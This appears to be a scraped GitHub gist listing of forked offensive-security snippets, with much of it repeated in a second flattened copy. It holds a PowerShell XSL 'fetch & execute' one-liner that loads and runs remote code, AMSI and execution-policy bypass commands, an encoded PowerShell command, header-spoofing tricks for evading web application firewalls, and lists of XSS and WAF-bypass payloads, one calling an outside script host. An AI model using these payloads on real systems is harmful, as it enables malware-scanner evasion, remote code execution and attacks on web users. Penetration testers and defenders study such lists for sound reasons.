sharpicx

## AmsiContextHook.cpp
#include <Windows.h>
#include <Psapi.h>
#include <metahost.h>
#include <comutil.h>
#include <mscoree.h>
#include "patch_info.h"
#include "base\helpers.h"

/**
 * For the debug build we want:

## amsi-bypass.md

      
              3 files
            
          
              0 forks
            
          
                0 comments
              
            
              0 stars
            
          
                sharpicx
                / amsi-bypass.md
            
            
              Created
              July 14, 2024 19:44
                — forked from D3Ext/amsi-bypass.md
            
              
                All methods to bypass AMSI (2022)
              
          
    AMSI Bypass

To perform all this techniques you can simply try them by typing "Invoke-Mimikatz" into your powershell terminal, you'll notice that even if you haven't imported Mimikatz it will detect that as malicious. But if the AMSI is off or you avoid it, it just will say that "it's not recognized as the name of a cmdlet", so you could say that you've bypassed the AMSI
However some methods may be detected by the AV but most of them actually work without problem
Powershell downgrade

The first and worst way to bypass AMSI is downgrading powershell version to 2.0.

  
## PowerShell.txt
##############################################################################
### Powershell Xml/Xsl Assembly "Fetch & Execute"
### [https://twitter.com/bohops/status/966172175555284992]

$s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xsl',$s,$r);$x.Transform('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xml','z');del z;

##############################################################################
### Powershell VBScript Assembly SCT "Fetch & Execute"
### [https://twitter.com/bohops/status/965670898379476993]

## PowershellBypass.ps1
https://www.netspi.com/blog/technical/network-penetration-testing/15-ways-to-bypass-the-powershell-execution-policy/

powershell.exe -ExecutionPolicy Bypass
PowerShell.exe -ExecutionPolicy Bypass -File .runme.ps1
PowerShell.exe -ExecutionPolicy UnRestricted -File .runme.ps1
PowerShell.exe -ExecutionPolicy Remote-signed -File .runme.ps1
Echo Write-Host "My voice is my passport, verify me." | PowerShell.exe -noprofile -
powershell.exe -Enc VwByAGkAdABlAC0ASABvAHMAdAAgACcATQB5ACAAdgBvAGkAYwBlACAAaQBzACAAbQB5ACAAcABhAHMAcwBwAG8AcgB0ACwAIAB2AGUAcgBpAGYAeQAgAG0AZQAuACcA

Set-ExecutionPolicy Bypass -Scope Process

## WinDbg and LLDB commands.md

      
              1 file
            
          
              0 forks
            
          
                0 comments
              
            
              0 stars
            
          
                sharpicx
                / WinDbg and LLDB commands.md
            
            
              Created
              November 29, 2023 03:53
                — forked from rafaelldi/WinDbg and LLDB commands.md
            
              
                WinDbg and LLDB commands
              
          
    Starting


Command
WinDbg
LLDB


Start
windbg {executable} [{args}]
lldb {executable} [--args]


Attach
windbg -p {pid}
lldb --attach-pid {pid}


Symbols and modules


Command
WinDbg
LLDB


(Re)load symbols
lb {module-name}
target symbols add {symbol-file-path}


## xss_cheatsheet.md

      
              1 file
            
          
              0 forks
            
          
                0 comments
              
            
              1 star
            
          
                sharpicx
                / xss_cheatsheet.md
            
            
              Created
              May 5, 2023 22:36
                — forked from abaykan/xss_cheatsheet.md
            
              
                Full List of XSS Cheatsheet
              
          
    <!-- Source: https://www.openbugbounty.org/blog/ismailtsdln/everything-about-xss-is-in-this-source/ -->

<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>


## gist:5fbad682a91f008b2d4f007ff73eb0fe
CACHE_INFO: 127.0.0.1
CF_CONNECTING_IP: 127.0.0.1
CF-Connecting-IP: 127.0.0.1
CLIENT_IP: 127.0.0.1
Client-IP: 127.0.0.1
COMING_FROM: 127.0.0.1
CONNECT_VIA_IP: 127.0.0.1
FORWARD_FOR: 127.0.0.1
FORWARD-FOR: 127.0.0.1
FORWARDED_FOR_IP: 127.0.0.1

## bypass waf by http headers
- X-forwarded-for
- X-remote-IP
- X-originating-IP
- x-remote-addr
waf通常会有一个不拦截任意请求的白名单ip，上面的几个头可以用来伪造ip
如：
X-Forwarded-For: 127.0.0.1
X-Remote-Ip: 127.0.0.1
X-Originating-Ip: 127.0.0.1
X-Remote-Addr: 127.0.0.1

## xss-bypass-waf
@vanshitmalhotra | Bypass AWS WAF -//
Add "<!" (without quotes) before your payload and bypass that WAF. :)
eg: <!<script>confirm(1)</script>

@black0x00mamba | Bypass WAF Akamaighost & filtered onload, onclick, href, src, onerror, script, etc
<img  sr%00c=x o%00nerror=((pro%00mpt(1)))>

DotDefender WAF bypass by @0xInfection
<bleh/ondragstart=&Tab;parent&Tab;['open']&Tab;&lpar;&rpar;%20draggable=True>dragme

## xxsfilterbypass.lst
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
	#include <Windows.h>
	#include <Psapi.h>
	#include <metahost.h>
	#include <comutil.h>
	#include <mscoree.h>
	#include "patch_info.h"
	#include "base\helpers.h"

	/**
	* For the debug build we want:
	##############################################################################
	### Powershell Xml/Xsl Assembly "Fetch & Execute"
	### [https://twitter.com/bohops/status/966172175555284992]

	$s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xsl',$s,$r);$x.Transform('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xml','z');del z;

	##############################################################################
	### Powershell VBScript Assembly SCT "Fetch & Execute"
	### [https://twitter.com/bohops/status/965670898379476993]
	https://www.netspi.com/blog/technical/network-penetration-testing/15-ways-to-bypass-the-powershell-execution-policy/

	powershell.exe -ExecutionPolicy Bypass
	PowerShell.exe -ExecutionPolicy Bypass -File .runme.ps1
	PowerShell.exe -ExecutionPolicy UnRestricted -File .runme.ps1
	PowerShell.exe -ExecutionPolicy Remote-signed -File .runme.ps1
	Echo Write-Host "My voice is my passport, verify me." \| PowerShell.exe -noprofile -
	powershell.exe -Enc VwByAGkAdABlAC0ASABvAHMAdAAgACcATQB5ACAAdgBvAGkAYwBlACAAaQBzACAAbQB5ACAAcABhAHMAcwBwAG8AcgB0ACwAIAB2AGUAcgBpAGYAeQAgAG0AZQAuACcA

	Set-ExecutionPolicy Bypass -Scope Process
Command	WinDbg	LLDB
Start	`windbg {executable} [{args}]`	`lldb {executable} [--args]`
Attach	`windbg -p {pid}`	`lldb --attach-pid {pid}`
	CACHE_INFO: 127.0.0.1
	CF_CONNECTING_IP: 127.0.0.1
	CF-Connecting-IP: 127.0.0.1
	CLIENT_IP: 127.0.0.1
	Client-IP: 127.0.0.1
	COMING_FROM: 127.0.0.1
	CONNECT_VIA_IP: 127.0.0.1
	FORWARD_FOR: 127.0.0.1
	FORWARD-FOR: 127.0.0.1
	FORWARDED_FOR_IP: 127.0.0.1
	- X-forwarded-for
	- X-remote-IP
	- X-originating-IP
	- x-remote-addr
	waf通常会有一个不拦截任意请求的白名单ip，上面的几个头可以用来伪造ip
	如：
	X-Forwarded-For: 127.0.0.1
	X-Remote-Ip: 127.0.0.1
	X-Originating-Ip: 127.0.0.1
	X-Remote-Addr: 127.0.0.1
	@vanshitmalhotra \| Bypass AWS WAF -//
	Add "<!" (without quotes) before your payload and bypass that WAF. :)
	eg: <!<script>confirm(1)</script>

	@black0x00mamba \| Bypass WAF Akamaighost & filtered onload, onclick, href, src, onerror, script, etc
	<img sr%00c=x o%00nerror=((pro%00mpt(1)))>

	DotDefender WAF bypass by @0xInfection
	<bleh/ondragstart=&Tab;parent&Tab;['open']&Tab;()%20draggable=True>dragme
	';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
	'';!--"<XSS>=&{()}
	0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
	<script/src=data:,alert()>
	<marquee/onstart=alert()>
	<video/poster/onerror=alert()>
	<isindex/autofocus/onfocus=alert()>
	<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
	<IMG SRC="javascript:alert('XSS');">
	<IMG SRC=javascript:alert('XSS')>